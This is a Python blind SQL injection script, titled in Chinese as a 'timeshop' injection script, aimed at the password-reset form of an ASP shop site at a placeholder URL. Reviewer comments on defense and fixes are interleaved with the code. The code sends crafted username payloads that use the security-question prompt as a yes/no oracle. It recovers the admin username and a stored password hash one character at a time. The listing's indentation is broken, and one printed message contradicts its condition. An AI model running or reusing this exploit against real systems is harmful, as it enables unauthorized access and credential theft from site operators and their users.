timeshop注入脚本

import requests

# Length probe against the password-reset form (action=repass) of the shop
# application. The host below is a placeholder.
# NOTE(review): indentation was lost in this listing; the print() calls after
# `if` / `else:` belong to those branches.
#
# Defender view: the request only yields information if the server builds its
# SQL by concatenating the `username` form field. The server code is not shown
# here, so that is presumed. The fix is a parameterized query for the username
# lookup, plus a reset page that returns the same response for every outcome.
url = 'http://www.xxxx.com/profile.asp?action=repass&shop=1'

# One session object is reused for every request in the script.
request = requests.session()

header = {

# Every request carries this identical, fixed User-Agent string.
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'

}
data = {

# The value closes the quoted string with `'` and appends a sub-select on the
# [admin] table that compares len(admin) with 8. A quote followed by `select`
# in a username field is a strong signal for WAF or log rules.
'username' : "1'and (select top 1 len(admin) from [admin])=8 and '1'='1",
'Submit' : "%C8%B7%26%23160%3B%B6%A8"

}

tmp = request.post(url,data=data,headers=header,timeout=5)

# The response is decoded as gb2312 before the marker text is searched for.
tmp.encoding = 'gb2312'

print(tmp.text)

# The script treats the presence of this marker (the security-question
# prompt) as "condition true". A page that differs between the two outcomes
# is what makes the reset form usable as a yes/no oracle.
if '密码提问' in tmp.text:

print('用户名长度是8')

else:

# NOTE(review): the message says 5 while the condition above tests for 8.
print('用户名长度不是5 要爆破一下用户名哦~')

# Character-by-character recovery of the `admin` column of [admin], using the
# page marker as a yes/no answer.
# NOTE(review): indentation was lost in this listing; the inner `for`, the
# dict, the POST and the `if` body are nested inside the outer loop.
#
# Defender view: each candidate character costs one POST, so this stage sends
# up to 8 * 79 = 632 requests to the same reset URL from one session. That
# burst, combined with `asc(mid(` and `[admin]` in the `username` field, is an
# easy pattern to alert on and to rate-limit.
users = []

# Template: {0} is the 1-based character position, {1} the character code
# that is compared with asc(mid(admin, pos, 1)).
# NOTE(review): mid()/asc()/top 1 look like Access/Jet SQL; confirm the backend.
payload = "1'or (select top 1 asc(mid(admin,{0},1)) from [admin])={1} and '1'='1"

# Positions 1..8 (i + 1).
for i in range(8):

# Candidate codes 48..126, i.e. '0' through '~'.
for j in range(48,127):

user_data = {

'username' : payload.format(str(i+1),str(j)),

'Submit' : "%C8%B7%26%23160%3B%B6%A8"

}

tmp = request.post(url,data=user_data,headers=header,timeout=5)

tmp.encoding = 'gb2312'

# Marker present: the guessed code is taken as correct for this position.
if '密码提问' in tmp.text:

print(chr(j))

users.append(chr(j))

break

print('用户:'+''.join(str(i) for i in users))

# Same per-character loop, now over the `userpassword` column of [admin].
# NOTE(review): indentation is inconsistent in this listing; the inner `for`
# is nested in the outer one, and the closing `}` of the dict sits at column 0.
#
# Defender view: the loop reads 16 characters and the final label calls the
# result an MD5, which suggests a truncated, unsalted MD5 is stored. Verify
# against the schema. Such a value gives little protection once it leaks.
# Store passwords with a salted, slow password hash (bcrypt, scrypt, Argon2)
# and query through a least-privilege database account. This stage sends up
# to 16 * 79 = 1264 POSTs to the reset URL.
payload = "1'and (select top 1 asc(mid(userpassword,{0},1)) from [admin])={1} and '1'='1"

passs = []
# Positions 1..16 (i + 1).
for i in range(16):

# Candidate codes 48..126, i.e. '0' through '~'.
for j in range(48,127):
    pass_data = {
    'username' : payload.format(str(i+1),str(j)),
    'Submit' : "%C8%B7%26%23160%3B%B6%A8"
}
    # NOTE(review): timeout is 50 here, while the earlier requests use 5.
    tmp = request.post(url,data=pass_data,headers=header,timeout=50)
    tmp.encoding = 'gb2312'
    # The response length is printed for every request.
    print(len(tmp.text))
    # Marker present: the guessed code is taken as correct for this position.
    if '密码提问' in tmp.text:
        print(chr(j))
        passs.append(chr(j))
        break

print('密码MD5:'+''.join(str(i) for i in passs))
